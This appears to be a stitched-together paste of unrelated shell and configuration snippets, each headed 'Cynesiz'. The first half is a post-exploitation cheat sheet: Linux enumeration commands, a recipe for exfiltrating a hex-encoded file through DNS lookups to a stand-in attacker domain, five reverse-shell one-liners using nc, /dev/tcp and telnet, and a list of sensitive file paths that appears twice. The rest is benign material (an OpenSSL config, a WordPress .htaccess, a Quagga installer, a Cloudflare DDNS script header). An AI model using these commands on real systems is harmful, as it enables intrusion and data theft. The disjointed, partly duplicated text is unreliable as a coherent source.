Cynesiz

// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs

Cynesiz

On victim:
1. Hex encode the file to be transferred: 
xxd -p secret file.hex
2. Read in each line and do a DNS lookup:
for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done

On attacker:
1. Capture DNS exfil packets
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packet

Cynesiz

#1
nc <attacker_ip> <port> -e /bin/bash
#2
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#3
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
#4
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#5
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

Cynesiz

/apache/logs/access.log
/apache/logs/error.log
/bin/php.ini
/etc/alias
/etc/apache2/apache.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache/conf/httpd.conf
/etc/bash.bashrc
/etc/chttp.conf

Cynesiz

/apache/logs/access.log
/apache/logs/error.log
/bin/php.ini
/etc/alias
/etc/apache2/apache.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache/conf/httpd.conf
/etc/bash.bashrc
/etc/chttp.conf

Cynesiz

[ req ]
default_bits = 4096
default_md = sha256
default_keyfile = private.key
distinguished_name = req_distinguished_name
attributes = req_attributes
x509_extensions = v3_user_req
req_extensions = v3_user_req

[ req_distinguished_name ]

Cynesiz

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Cynesiz

#!/bin/bash
### Copy/paste from https://wiki.ubuntu.com/JonathanFerguson/Quagga

## Use
## ===
## $ sudo ./installQuagga.sh

## Install the Quagga routing daemon
## =================================
apt-get -y install quagga

Cynesiz

#!/bin/bash
# bash generate random alphanumeric string
#

# bash generate random 32 character alphanumeric string (upper and lowercase) and 
NEW_UUID=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)

# bash generate random 32 character alphanumeric string (lowercase only)
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1

Cynesiz

#!/usr/bin/env bash

# Step 1: Fill in EMAIL, TOKEN, DOMAIN and SUBDOMAIN. Your API token is here: https://www.cloudflare.com/a/account/my-account
#         Make sure the token is the Global token, or has these permissions: #zone:read, #dns_record:read, #dns_records:edit
# Step 2: Create an A record on Cloudflare with the subdomain you chose
# Step 3: Run "./ddns.sh -l" to get the zone_id and rec_id of the record you created.
#         Fill in ZONE_ID and REC_ID below
#         This step is optional, but will save you 2 requests every time you this script
# Step 4: Run "./ddns.sh". It should tell you that record was updated or that it didn't need updating.
# Step 5: Run it every hour with cron. Use the '-s' flag to silence normal output